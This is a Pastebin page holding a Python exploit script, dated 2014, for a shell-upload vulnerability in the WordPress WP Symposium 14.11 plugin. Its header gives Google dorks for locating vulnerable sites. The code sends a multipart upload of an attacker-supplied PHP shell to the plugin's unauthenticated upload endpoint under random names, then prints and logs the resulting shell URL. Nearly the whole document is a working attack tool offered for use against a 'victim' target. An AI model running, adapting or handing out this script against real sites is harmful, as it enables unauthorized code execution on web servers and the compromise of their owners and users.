Googleinurl

[EXPLOIT]Sh311 Upl04d Vuln3r4b1l1ty Wp-Symposium v14.11

Dec 11th, 2014
932
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/usr/bin/python
  2. #-------------------------------------------------------------------------------
  3. # Exploit Name: Wordpress WP Symposium 14.11 Shell Upload Vulnerability
  4. # Vulnerability discovered by Claudio Viviani - http://www.homelab.it
  5. # Exploit written by Claudio Viviani / Edited INURL - BRASIL
  6. # 2014-11-27:  Discovered vulnerability
  7. # 2014-12-01:  Vendor Notification (Twitter)
  8. # 2014-12-02:  Vendor Notification (Web Site)
  9. # 2014-12-04:  Vendor Notification (E-mail)
  10. # 2014-12-11:  No Response/Feedback
  11. # 2014-12-11:  Published
  12. # DORK:  index of "wp-symposium"
  13. # DORK:  inurl:"plugins/wp-symposium" -site:wordpress.org
  14. # Video Demo + Fix: https://www.youtube.com/watch?v=pF8lIuLT6Vs
  15. #-------------------------------------------------------------------------------
  16. import urllib, urllib2, socket
  17. import sys
  18. import string, random
  19. import optparse
  20. import os, os.path, mimetypes
  21. import datetime
  22. import os
  23.  
  24. def checkurl(url):
  25.     if url[:8] != "https://" and url[:7] != "http://":
  26.         print('[X] You must insert http:// or https:// procotol')
  27.         sys.exit(1)
  28.     else:
  29.         return url
  30.  
  31. def checkfile(file):
  32.     if not os.path.isfile(file) and not os.access(file, os.R_OK):
  33.         print '[X] '+file+' file is missing or not readable'
  34.         sys.exit(1)
  35.     else:
  36.         return file
  37. # Get file's mimetype
  38. def get_content_type(filename):
  39.     return mimetypes.guess_type(filename)[0] or 'application/octet-stream'
  40.  
  41. def id_generator(size=6, chars=string.ascii_uppercase + string.ascii_lowercase + string.digits):
  42.     return ''.join(random.choice(chars) for _ in range(size))
  43.  
  44.  
  45. # Create multipart header
  46. def create_body_sh3ll_upl04d(payloadname, randDirName, randShellName):
  47.  
  48.    getfields = dict()
  49.    getfields['uploader_uid'] = '1'
  50.    getfields['uploader_dir'] = './'+randDirName
  51.    getfields['uploader_url'] = url_symposium_upload
  52.  
  53.    payloadcontent = open(payloadname).read()
  54.  
  55.    LIMIT = '----------lImIt_of_THE_fIle_eW_$'
  56.    CRLF = '\r\n'
  57.  
  58.    L = []
  59.    for (key, value) in getfields.items():
  60.       L.append('--' + LIMIT)
  61.       L.append('Content-Disposition: form-data; name="%s"' % key)
  62.       L.append('')
  63.       L.append(value)
  64.  
  65.    L.append('--' + LIMIT)
  66.    L.append('Content-Disposition: form-data; name="%s"; filename="%s"' % ('files[]', randShellName+".php"))
  67.    L.append('Content-Type: %s' % get_content_type(payloadname))
  68.    L.append('')
  69.    L.append(payloadcontent)
  70.    L.append('--' + LIMIT + '--')
  71.    L.append('')
  72.    body = CRLF.join(L)
  73.    return body
  74.  
  75. banner = """
  76. 0x[EXPLOIT NAME]: Sh311 Upl04d Vuln3r4b1l1ty Wp-Symposium v14.11 / INURL - BRASIL
  77. ------------------------------------------------------------------------------------------------------------------
  78. """
  79.  
  80. commandList = optparse.OptionParser('usage: %prog -t URL -f FILENAME.PHP [--timeout sec]')
  81. commandList.add_option('-t', '--target', action="store",
  82.                   help="Insert TARGET URL: http[s]://www.victim.com[:PORT]",
  83.                   )
  84. commandList.add_option('-f', '--file', action="store",
  85.                   help="Insert file name, ex: shell.php",
  86.                   )
  87. commandList.add_option('--timeout', action="store", default=10, type="int",
  88.                   help="[Timeout Value] - Default 10",
  89.                   )
  90.  
  91. options, remainder = commandList.parse_args()
  92.  
  93. # Check args
  94. if not options.target or not options.file:
  95.     print(banner)
  96.     commandList.print_help()
  97.     sys.exit(1)
  98.  
  99. payloadname = checkfile(options.file)
  100. host = checkurl(options.target)
  101. timeout = options.timeout
  102.  
  103. print(banner)
  104.  
  105. socket.setdefaulttimeout(timeout)
  106.  
  107. url_symposium_upload = host+'/wp-content/plugins/wp-symposium/server/php/'
  108.  
  109. content_type = 'multipart/form-data; boundary=----------lImIt_of_THE_fIle_eW_$'
  110.  
  111. randDirName = id_generator()
  112. randShellName = id_generator()
  113.  
  114. bodyupload = create_body_sh3ll_upl04d(payloadname, randDirName, randShellName)
  115.  
  116. headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
  117.            'content-type': content_type,
  118.            'content-length': str(len(bodyupload)) }
  119.  
  120. try:
  121.     req = urllib2.Request(url_symposium_upload+'index.php', bodyupload, headers)
  122.     response = urllib2.urlopen(req)
  123.     read = response.read()
  124.  
  125.     if "error" in read or read == "0" or read == "":
  126.        now = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
  127.        print('0x' + str(now) + '[INFO][NOT VULN]: Upload Failed')
  128.     else:
  129.        now = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
  130.        print('0x' + str(now) + '[INFO][VALUE]: Shell Uploaded')
  131.        now = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
  132.        print('0x' + str(now) + '[INFO][VALUE]: Location: '+url_symposium_upload+randDirName+randShellName+'.php')
  133.        file_saved = 'poffOUTPUT_Sh311_Upl04d_Vuln3r4b1l1ty.txt'
  134.  
  135.        msg = '0x[INFO][FILE SAVED]: '+file_saved + "\n"
  136.        url_saved = url_symposium_upload+randDirName+randShellName+".php\n"
  137.     if os.path.exists(file_saved):
  138.        arquivo = open(file_saved, 'a')
  139.        arquivo.write(url_saved)
  140.        arquivo.close()
  141.        print(msg)
  142.     else:
  143.        arquivo = open(file_saved, 'w')
  144.        arquivo.write(url_saved)
  145.        arquivo.close()
  146.        print(msg)
  147.  
  148. except urllib2.HTTPError as e:
  149.     now = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
  150.     print('0x' + str(now) + '[INFO][ERROR]: '+str(e))
  151. except urllib2.URLError as e:
  152.     now = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
  153.     print('0x' + str(now) + '[INFO][ERROR]: Connection Error: '+str(e))
RAW Paste Data

Adblocker detected! Please consider disabling it...

We've detected AdBlock Plus or some other adblocking software preventing Pastebin.com from fully loading.

We don't have any obnoxious sound, or popup ads, we actively block these annoying types of ads!

Please add Pastebin.com to your ad blocker whitelist or disable your adblocking software.

×